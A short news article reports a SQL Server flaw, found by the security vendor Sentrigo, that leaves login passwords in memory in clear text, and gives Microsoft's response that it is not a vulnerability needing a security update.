SQL Server vulnerability is a 'non-issue', Microsoft

Microsoft is downplaying a SQL Server security flaw that could be exploited by someone with administrative privileges to see users' unencrypted passwords. The vulnerability was discovered last year by database security vendor Sentrigo when one of their researchers noticed that the unique string of their personal password was visible in memory in SQL Server. "Passwords used […]

Microsoft is downplaying a SQL Server security flaw that could be exploited by someone with administrative privileges to see users' unencrypted passwords. The vulnerability was discovered last year by database security vendor Sentrigo when one of their researchers noticed that the unique string of their personal password was visible in memory in SQL Server. "Passwords used to login to SQL Server’re stored in memory in clear text," explained Sentrigo CTO Slavik Markovich. "These’re not erased until SQL Server is restarted, so (they) may in many cases include passwords going back for weeks or months in production environments. It is a simple matter of dumping memory in byte format, and reviewing the contents looking for usernames, which will be followed by the password." Despite this, Microsoft contends the vulnerability is much ado about nothing. “Microsoft has thoroughly investigated claims of vulnerabilities in SQL Server and found that these are not product vulnerabilities requiring Microsoft to issue a security update,” a spokesman said.